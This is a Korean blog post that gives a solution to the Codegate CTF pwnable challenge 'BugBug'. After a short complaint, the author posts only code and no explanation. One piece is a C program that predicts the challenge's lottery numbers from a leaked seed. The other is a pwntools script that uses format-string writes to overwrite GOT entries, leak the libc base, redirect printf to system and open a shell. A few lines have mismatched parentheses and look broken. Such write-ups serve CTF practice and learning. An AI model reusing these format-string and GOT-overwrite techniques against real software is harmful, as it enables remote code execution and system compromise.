Write-up/Pwnable

[Codegate] BugBug

MyriaBreak 2018. 8. 22. 18:11

아 풀다가 화나서ㅁㄴㅇㄹ... 대체 고놈의 오류때문에;;; 결국 원인은 알아내지못하고 갈아엎고 다시 코드를 짜게 되었다 ㅡㅡ;;;


귀찮아서 설명은 안적겟다 하ㅏㅏㅏㅏ 진짜;;;

그냥 익스코드만 올려놔야지



1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#include <stdio.h>
#include <stdlib.h>
 
int main(int argc, char* argv[])
{
    unsigned int seed;
    //FILE* urand = fopen("/dev/urandom", "rb");
    int i,j;
    int random[6]={0,0,0,0,0,0};
    int next_random;
 
    if(argc <2 )
        return 0;
    seed = atoi(argv[1]);
        //fread(&seed, 4, 1, urand);
       srand(seed);
 
    for(i=0; i<6; i++)
    {
        next_random = rand()%45+1;
        for(j=0; j<i; j++)
        {
            if(random[j]==next_random){
                next_random = rand()%45+1;
                j=0;
            }
        }
        random[i]=next_random;
    }
    for(i=0; i<6; i++)
        printf("%d ",random[i]);
    printf("\n");
    return 0;
}    
 
cs






1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
from pwn import *
from subprocess import Popen, PIPE
 
conn = process("./BugBug")
 
def get_lottonum(seed):
    command = "./rand "+str(seed)
    popen = Popen(command, shell=True, stdout=PIPE)
    output, error = popen.communicate()    
    return output
 
exit_got = 0x804A024
printf_got = 0x804A010
main_addr = 0x804882E
 
# exit_got -> main_addr
payload = "%"+str(main_addr&0xFFFF)+"x"
payload += "%21$hn"
payload += "A"*(16-len(payload))
payload += p32(exit_got)
payload += "BASE%4$x"
payload += "B"*(100-len(payload))
 
conn.recvuntil("Who are you?")    
conn.sendline(payload)
conn.recvuntil("Hello~ ")
conn.recv(100)
## leak Lotto SEED
seed = u32(conn.recv(4))
lotto_num = get_lottonum(seed)
 
## leak and FSB
log.info(lotto_num)
conn.recvuntil("==> ")
conn.sendline(lotto_num)
 
## leak BASE_addr
conn.recvuntil("BASE")
base_addr = int(conn.recvuntil("BB")[:-2], 16- 0x1fda74
log.info("base_addr : 0x%x" % base_addr)
 
system_addr = base_addr + 0x3ada0
system_first = (system_addr&0xFFFF)
system_next = (system_addr>>16- (system_addr&0xFFFF)
 
log.info("distance : %d" % (system_next))
 
payload = "%"+str(system_first)+"x"
payload += "%26$hn"
payload += "%"+str(system_next)+"x"
payload += "%27$hn"
payload += "A"*(32-len(payload))
payload += p32(printf_got)
payload += p32(printf_got+2)
payload += "B"*(100-len(payload))
 
conn.sendline(payload)
conn.sendline(lotto_num)
conn.sendline("/bin/sh;")
conn.recvuntil("Input your answer@_@")
conn.sendline(lotto_num)
 
conn.interactive()
cs